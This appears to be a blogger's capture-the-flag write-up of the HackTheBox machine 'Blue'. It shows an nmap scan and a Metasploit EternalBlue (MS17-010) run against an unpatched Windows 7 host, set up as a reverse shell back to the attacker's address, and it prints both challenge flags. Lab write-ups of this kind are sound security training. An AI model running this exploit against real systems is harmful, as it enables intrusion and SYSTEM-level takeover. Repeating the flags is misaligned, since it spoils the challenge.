DcodeZer0

┌──[root@dcodezero] └──╼ # Hacker | RedTeam | PenTester | CTFPlayer | HackTheBox

NMAP scan.

    PORT      STATE SERVICE      VERSION
    135/tcp   open  msrpc        Microsoft Windows RPC
    139/tcp   open  netbios-ssn  Microsoft Windows netbios-ssn
    445/tcp   open  microsoft-ds Windows 7 Professional 7601 Service Pack 1 microsoft-ds (workgroup: WORKGROUP)
    49152/tcp open  msrpc        Microsoft Windows RPC
    49153/tcp open  msrpc        Microsoft Windows RPC
    49154/tcp open  msrpc        Microsoft Windows RPC
    49155/tcp open  msrpc        Microsoft Windows RPC
    49156/tcp open  msrpc        Microsoft Windows RPC
    49157/tcp open  msrpc        Microsoft Windows RPC
    Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
    Aggressive OS guesses: Microsoft Windows Server 2008 SP1 (96%), Microsoft Windows Server 2008 SP2 (96%), Microsoft Windows 7 (96%), Microsoft Windows 7 SP0 - SP1 or Windows Server 2008 (96%), Microsoft Windows 7 SP0 - SP1, Windows Server 2008 SP1, Windows Server 2008 R2, Windows 8, or Windows 8.1 Update 1 (96%), Microsoft Windows 7 SP1 (96%), Microsoft Windows 7 Ultimate (96%), Microsoft Windows 8.1 (96%), Microsoft Windows 8.1 Update 1 (96%), Microsoft Windows Vista or Windows 7 SP1 (96%)
    No exact OS matches for host (test conditions non-ideal).
    Network Distance: 2 hops
    Service Info: Host: HARIS-PC; OS: Windows; CPE: cpe:/o:microsoft:windows

    Host script results:
    |_clock-skew: mean: 1m33s, deviation: 1s, median: 1m32s
    | smb-os-discovery: 
    |   OS: Windows 7 Professional 7601 Service Pack 1 (Windows 7 Professional 6.1)
    |   OS CPE: cpe:/o:microsoft:windows_7::sp1:professional
    |   Computer name: haris-PC
    |   NetBIOS computer name: HARIS-PC\x00
    |   Workgroup: WORKGROUP\x00
    |_  System time: 2020-03-08T16:52:23+00:00
    | smb-security-mode: 
    |   account_used: guest
    |   authentication_level: user
    |   challenge_response: supported
    |_  message_signing: disabled (dangerous, but default)
    | smb2-security-mode: 
    |   2.02: 
    |_    Message signing enabled but not required
    | smb2-time: 
    |   date: 2020-03-08T16:52:25
    |_  start_date: 2020-03-08T16:46:59

Wowww!!! There are a lot of open ports and I can see that it is a [Windows 7 Professional 7601 Service Pack 1]. We can use many mays to hack into this machine, now I use metasploit to gain the shell of the machine.

Metasploit

    msf5 > use  exploit/windows/smb/ms17_010_eternalblue
    msf5 exploit(windows/smb/ms17_010_eternalblue) > show options

    Module options (exploit/windows/smb/ms17_010_eternalblue):

    Name           Current Setting  Required  Description
    ----           ---------------  --------  -----------
    RHOSTS                          yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
    RPORT          445              yes       The target port (TCP)
    SMBDomain      .                no        (Optional) The Windows domain to use for authentication
    SMBPass                         no        (Optional) The password for the specified username
    SMBUser                         no        (Optional) The username to authenticate as
    VERIFY_ARCH    true             yes       Check if remote architecture matches exploit Target.
    VERIFY_TARGET  true             yes       Check if remote OS matches exploit Target.

    Exploit target:
    Id  Name
    --  ----
    0   Windows 7 and Server 2008 R2 (x64) All Service Packs

    msf5 exploit(windows/smb/ms17_010_eternalblue) > set rhosts 10.10.10.40
    rhosts => 10.10.10.40
    msf5 exploit(windows/smb/ms17_010_eternalblue) > set lhost 10.10.14.5
    lhost => 10.10.14.5
    msf5 exploit(windows/smb/ms17_010_eternalblue) > set lport 4444
    lport => 4444
    msf5 exploit(windows/smb/ms17_010_eternalblue) > exploit

After the exploit is successfully completed we get the [Meterpreter] shell…

Getting User.txt

    C:\Users\haris>cd Desktop
    cd Desktop

    C:\Users\haris\Desktop>dir
    dir
    Volume in drive C has no label.
    Volume Serial Number is A0EF-1911

    Directory of C:\Users\haris\Desktop

    24/12/2017  03:23    <DIR>          .
    24/12/2017  03:23    <DIR>          ..
    21/07/2017  07:54                32 user.txt
                1 File(s)             32 bytes
                2 Dir(s)  15,763,046,400 bytes free

    C:\Users\haris\Desktop>type user.txt
    type user.txt
    4c546aea7dbee75cbd71de245c8deea9

Getting Root.txt

    C:\Users\Administrator>cd Desktop
    cd Desktop

    C:\Users\Administrator\Desktop>dir
    dir
    Volume in drive C has no label.
    Volume Serial Number is A0EF-1911

    Directory of C:\Users\Administrator\Desktop

    24/12/2017  03:22    <DIR>          .
    24/12/2017  03:22    <DIR>          ..
    21/07/2017  07:57                32 root.txt
                1 File(s)             32 bytes
                2 Dir(s)  15,753,887,744 bytes free

    C:\Users\Administrator\Desktop>type root.txt
    type root.txt
    ff548eb71e920ff6c08843ce9df4e717

This gives us a reverse shell as nt authority\system and we are able to read the root and user flags

If you like my work, please do consider giving me +rep on HACKTHEBOX.

My HackTheBox profile: https://www.hackthebox.eu/home/users/profile/291968

You may also enjoy

Game of Active Directory - Part 3 [Recon]

4 minute read

GOAD is a pentest active directory LAB project. The purpose of this lab is to give pentesters a vulnerable Active directory environment ready to use to pract...